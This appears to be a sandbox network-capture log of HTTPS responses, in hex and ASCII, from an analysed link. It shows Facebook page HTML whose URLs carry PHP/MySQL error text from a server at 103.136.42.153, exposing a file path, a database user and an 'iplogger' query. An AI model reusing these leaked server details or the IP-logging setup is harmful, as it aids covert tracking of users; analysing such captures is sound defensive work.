2022-10-07 13:59:28 UTC	753	IN	Data Raw: 74 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c Data Ascii: t.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx",
2022-10-07 13:59:28 UTC	755	IN	Data Raw: 5e 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b Data Ascii: ^)","\/_E\/":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[
2022-10-07 13:59:28 UTC	756	IN	Data Raw: 6b 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 Data Ascii: k\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/c
2022-10-07 13:59:28 UTC	758	IN	Data Raw: 6e 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 Data Ascii: n\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1
2022-10-07 13:59:28 UTC	759	IN	Data Raw: 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 30 Data Ascii: ","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":60
2022-10-07 13:59:28 UTC	760	IN	Data Raw: 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 32 51 65 38 43 50 57 5a 74 33 55 63 6b 48 73 76 58 6d 59 2d 53 6d 30 45 78 39 35 57 4a 63 53 72 6f 45 31 4c 49 69 71 4b 77 31 6a 7a 53 6f 41 4b 76 55 39 5f 4a 4a 39 53 50 63 6d 6c 76 52 62 73 6a 48 4e 6c 30 42 4b 54 56 39 69 45 76 79 37 70 2d 72 4e 43 4d 2d 5f 68 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 32 51 65 38 43 50 57 5a 74 33 55 63 6b 48 73 76 58 6d 59 2d 53 6d 30 45 78 39 35 57 4a 63 53 72 6f 45 31 4c 49 69 71 4b 77 31 6a 7a 53 6f 41 4b 76 55 39 5f 4a 4a 39 53 50 63 6d 6c 76 52 62 Data Ascii: "clearIntervalBlue","Aa2Qe8CPWZt3UckHsvXmY-Sm0Ex95WJcSroE1LIiqKw1jzSoAKvU9_JJ9SPcmlvRbsjHNl0BKTV9iEvy7p-rNCM-_hM"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa2Qe8CPWZt3UckHsvXmY-Sm0Ex95WJcSroE1LIiqKw1jzSoAKvU9_JJ9SPcmlvRb
2022-10-07 13:59:28 UTC	762	IN	Data Raw: 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 76 34 31 30 31 33 76 77 62 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 66 73 67 49 6f 48 4f 72 5f 74 79 38 31 43 59 4a 7a 6e 5a 47 5a 47 73 49 63 69 65 39 54 69 54 6c 72 50 68 72 61 50 58 76 31 38 33 35 49 Data Ascii: onfig",[],{},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdyv41013vwb","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa2fsgIoHOr_ty81CYJznZGZGsIcie9TiTlrPhraPXv1835I
2022-10-07 13:59:28 UTC	763	IN	Data Raw: 69 74 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 51 48 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 20 3c 69 Data Ascii: itle="Go to Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_QH"><span style="color: white">Join or Log Into Facebook <i
2022-10-07 13:59:28 UTC	765	IN	Data Raw: 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 33 5f 75 4a 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 67 6e 64 69 6d 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 34 5f 53 2b 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 67 6e 72 6e 64 22 20 76 61 6c 75 65 3d 22 30 36 35 39 32 38 5f 2d 67 4d 46 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 Data Ascii: ="off" name="timezone" value="" id="u_0_3_uJ" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_S+" /><input type="hidden" name="lgnrnd" value="065928_-gMF" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="h
2022-10-07 13:59:28 UTC	766	IN	Data Raw: 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 76 6c 20 5f 34 2d 64 6f 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 5f 34 2d 64 70 22 3e 54 68 69 73 20 70 61 67 65 20 69 73 6e 26 23 30 33 39 3b 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 3c 68 33 20 63 6c 61 73 73 3d 22 5f 34 2d 64 71 22 3e 54 68 65 20 6c 69 6e 6b 20 79 6f 75 20 66 6f 6c 6c 6f 77 65 64 20 6d 61 79 20 62 65 20 62 72 6f 6b 65 6e 2c 20 6f 72 20 74 68 65 20 70 61 67 65 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 3c 2f 68 33 3e 3c 69 20 63 6c 61 73 73 3d 22 6d 76 6c 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 37 37 38 38 63 30 22 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 6c 20 70 76 6c 20 5f 34 2d 64 72 20 66 73 Data Ascii: e="main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn't available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_ot1t5YjYL3s sx_7788c0"></i><div class="mbl pvl _4-dr fs
2022-10-07 13:59:28 UTC	768	IN	Data Raw: 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 Data Ascii: %3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhos
2022-10-07 13:59:28 UTC	769	IN	Data Raw: 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 Data Ascii: emoved\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u
2022-10-07 13:59:28 UTC	771	IN	Data Raw: 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c Data Ascii: 2520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\
2022-10-07 13:59:28 UTC	772	IN	Data Raw: 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a Data Ascii: .136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:
2022-10-07 13:59:28 UTC	774	IN	Data Raw: 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 Data Ascii: ssword:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00
2022-10-07 13:59:28 UTC	775	IN	Data Raw: 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 Data Ascii: ot;www_list_selector", 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20i
2022-10-07 13:59:28 UTC	777	IN	Data Raw: 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 69 74 5f 49 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a Data Ascii: font%3E" onclick="require("IntlUtils").setCookieLocale("it_IT", "en_US", "https:\/\/it-it.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():
2022-10-07 13:59:28 UTC	778	IN	Data Raw: 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 Data Ascii: tabase.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Acce
2022-10-07 13:59:28 UTC	780	IN	Data Raw: 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 Data Ascii: user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20
